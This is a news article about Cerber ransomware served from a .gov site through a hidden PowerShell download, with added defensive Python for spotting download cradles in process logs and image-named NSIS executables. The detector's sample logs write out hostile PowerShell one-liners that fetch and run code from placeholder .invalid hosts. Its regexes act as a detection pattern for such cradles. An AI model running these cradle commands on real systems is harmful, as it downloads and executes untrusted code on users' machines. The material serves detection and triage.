Ankit Anubhav, a researcher at NewSky Security, discovered the issue last Wednesday and disclosed it on Twitter. Within hours the malicious link had been removed from the website; it is unclear whether the file infected anyone.
The Department of Homeland Security has not issued an update or commented on the issue.
Ransomware has been around for quite a while, and Cerber is one of the more established crypto-ransomware families. It has been distributed through a number of channels, including spam email campaigns, botnets and exploit kits.
Hosting the payload on a .gov site is a smart move on the attackers' part. Government domains are routinely allow-listed or trusted by default, so a download from one is assumed to be clean and is less likely to be blocked or inspected. The point for defenders is that a domain's reputation says nothing about the safety of an individual file it serves; filtering that trusts the domain outright rather than inspecting what comes from it will miss exactly this case.
“This PowerShell downloads malware from a known malicious site and runs it,” Anubhav said. “All these steps of course happen automatically and the end user won't see it.”
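The behaviour Anubhav describes, a hidden PowerShell one-liner that fetches a file and executes it, is what defenders call a download cradle, and it leaves a recognisable shape in process command-line logs. The following is an added example of detection logic for such logs; it is not code from the article, from NewSky Security or from the incident. The sample command lines are constructed for the example (the URLs use the reserved .invalid domain), and the indicator list is a starting point, not an exhaustive signature.

```python
from __future__ import annotations

import base64
import re

# Switches and cmdlets that, together, make up a PowerShell "download cradle":
# fetch a payload from the network and execute it with nothing shown to the user.
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "no_profile": re.compile(r"-no(?:p|profile)\b", re.I),
    "bypass_policy": re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I),
    "web_download": re.compile(
        r"Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Start-BitsTransfer",
        re.I,
    ),
    "execute": re.compile(r"\b(?:iex|Invoke-Expression|Start-Process|Invoke-Item)\b", re.I),
}
# -EncodedCommand (and its short forms -e/-ec/-enc) carries base64 of a UTF-16LE script.
ENCODED_RE = re.compile(r"-e(?:nc|ncodedcommand|c)?\s+([A-Za-z0-9+/=]{16,})", re.I)
POWERSHELL_RE = re.compile(r"\bpowershell(?:\.exe)?\b|\bpwsh(?:\.exe)?\b", re.I)


def decode_encoded_command(cmdline: str) -> str | None:
    """Return the decoded -EncodedCommand payload, or None if there is none."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # not valid base64 / not UTF-16LE
        return None


def analyze_command_line(cmdline: str) -> dict:
    """Score one process command line for download-cradle indicators."""
    if not POWERSHELL_RE.search(cmdline):
        return {"powershell": False, "hits": [], "score": 0, "decoded": None}
    decoded = decode_encoded_command(cmdline)
    # Match against the visible text with the base64 blob removed, plus the
    # decoded script, so indicators inside the blob are not missed and random
    # base64 characters cannot produce false hits.
    text = ENCODED_RE.sub(" ", cmdline) + " " + (decoded or "")
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    if decoded is not None:
        hits.append("encoded_command")
    return {"powershell": True, "hits": hits, "score": len(hits), "decoded": decoded}


def is_download_cradle(cmdline: str) -> bool:
    """A cradle needs both a network fetch and an execution primitive."""
    r = analyze_command_line(cmdline)
    return r["powershell"] and "web_download" in r["hits"] and "execute" in r["hits"]


def scan_process_logs(lines: list[str]) -> list[int]:
    """Indices of log lines that look like download cradles."""
    return [i for i, line in enumerate(lines) if is_download_cradle(line)]


def _encode(script: str) -> str:
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample command lines (not captured from the incident); the URLs
# use the reserved .invalid TLD and resolve nowhere.
SAMPLE_PROCESS_LOGS = [
    'powershell.exe -NoProfile -Command "Get-Service | Where-Object Status -eq Running"',
    "powershell.exe -w hidden -nop -ep bypass -c \"(New-Object Net.WebClient)"
    ".DownloadFile('http://example.invalid/pic.gif','C:\\Temp\\p.exe'); Start-Process 'C:\\Temp\\p.exe'\"",
    "powershell.exe -w hidden -enc "
    + _encode("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')"),
    "notepad.exe C:\\Users\\analyst\\notes.txt",
]

if __name__ == "__main__":
    for i, line in enumerate(SAMPLE_PROCESS_LOGS):
        r = analyze_command_line(line)
        print(f"[{i}] score={r['score']} cradle={is_download_cradle(line)} hits={r['hits']}")
```

The encoded case matters in practice: `-EncodedCommand` hides every cmdlet name from a plain string match, so the blob has to be decoded (UTF-16LE, not UTF-8) before the same indicators are applied to it. Requiring both a download and an execution primitive keeps ordinary administrative PowerShell, such as the first sample line, out of the alert queue.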
Cerber is the final payload. Before it encrypts files on the host machine, it checks whether language packs for Commonwealth of Independent States (CIS) countries are installed on the compromised computer, and proceeds only when they are not.
Anubhav and Villafranca wrote that the supposed .gif file was in fact an executable: an NSIS installer that extracts the Cerber JSON configuration file. In March, researchers found that Cerber infections were succeeding in bypassing detection by hiding inside NSIS installers before executing. Researchers at Deep Instinct told Threatpost that Cerber versions 4 and 5.1 and many versions of Locky were using this technique, along with different versions of Cryptolocker and Cryptowall.
NSIS, short for Nullsoft Scriptable Install System, is an open-source tool used to build Windows installers. Because a great deal of legitimate software ships as NSIS installers, a payload wrapped in one looks unremarkable until its contents are unpacked.
When all is said and done, Cerber is still ransomware: it demands payment in Bitcoin in exchange for the supposed decryption key that unlocks the files.
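The two facts above, a file named as a GIF that is really an executable, and an executable that is really an NSIS installer, can both be checked from the bytes alone without running anything. The following is an added example of that triage check; it is not code from the article or from the researchers. The NSIS test looks for the installer's first-header marker (0xDEADBEEF followed by the literal "NullsoftInst"), which is the usual heuristic for identifying NSIS-built executables. The sample "installer" is a constructed byte string with just enough structure to exercise the checks; it is not a real program, and the GIF is a constructed one-pixel image.

```python
import os
import struct

# NSIS "firstheader": 0xDEADBEEF (little-endian) followed by the literal
# "NullsoftInst". Its presence is the standard heuristic for an NSIS installer.
NSIS_FIRSTHEADER_MAGIC = b"\xef\xbe\xad\xdeNullsoftInst"

# Leading byte signatures for the types we care about.
MAGICS = {
    "gif": (b"GIF87a", b"GIF89a"),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpeg": (b"\xff\xd8\xff",),
    "pe": (b"MZ",),
}
IMAGE_EXTENSIONS = {".gif": "gif", ".png": "png", ".jpg": "jpeg", ".jpeg": "jpeg"}


def sniff_type(data: bytes) -> str:
    """Classify by leading bytes, ignoring whatever the filename claims."""
    for kind, prefixes in MAGICS.items():
        if data.startswith(prefixes):
            return kind
    return "unknown"


def is_pe(data: bytes) -> bool:
    """MZ stub whose e_lfanew field (offset 0x3C) points at a 'PE\\0\\0' signature."""
    if len(data) < 0x40 or not data.startswith(b"MZ"):
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def is_nsis_installer(data: bytes) -> bool:
    return NSIS_FIRSTHEADER_MAGIC in data


def assess_download(filename: str, data: bytes) -> dict:
    """Compare the extension's claim with the bytes and flag NSIS-wrapped PEs."""
    ext = os.path.splitext(filename.lower())[1]
    claimed = IMAGE_EXTENSIONS.get(ext)
    sniffed = sniff_type(data)
    return {
        "claimed": claimed,
        "sniffed": sniffed,
        "extension_mismatch": claimed is not None and sniffed != claimed,
        "pe": is_pe(data),
        "nsis": is_nsis_installer(data),
        # The article's case: an image filename carrying an executable body.
        "suspicious": claimed is not None and (is_pe(data) or is_nsis_installer(data)),
    }


def build_fake_nsis_sample() -> bytes:
    """Constructed stand-in for the renamed installer: MZ stub, PE signature,
    NSIS marker, and nothing else. It is not a runnable program."""
    pe_offset = 0x80
    hdr = bytearray(b"MZ" + b"\0" * (0x3C - 2))
    hdr += struct.pack("<I", pe_offset)          # e_lfanew
    hdr += b"\0" * (pe_offset - len(hdr))
    hdr += b"PE\0\0" + b"\0" * 0x100             # PE signature, dummy headers
    # Firstheader layout: flags, 0xDEADBEEF, "NullsoftInst", header lengths.
    hdr += struct.pack("<I", 0) + NSIS_FIRSTHEADER_MAGIC + struct.pack("<II", 0, 0)
    return bytes(hdr)


# Constructed minimal GIF89a (a 1x1 image) for the benign comparison case.
REAL_GIF = (b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff"
            b"!\xf9\x04\x01\x00\x00\x00\x00,\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;")

if __name__ == "__main__":
    for name, blob in (("photo.gif", REAL_GIF), ("photo.gif", build_fake_nsis_sample())):
        print(name, assess_download(name, blob))
```

A check like this belongs at the download boundary, where the "trusted .gov domain" reasoning would otherwise wave the file through. It only classifies; to see the embedded script and the Cerber configuration, the installer still has to be unpacked with a tool that understands the NSIS format.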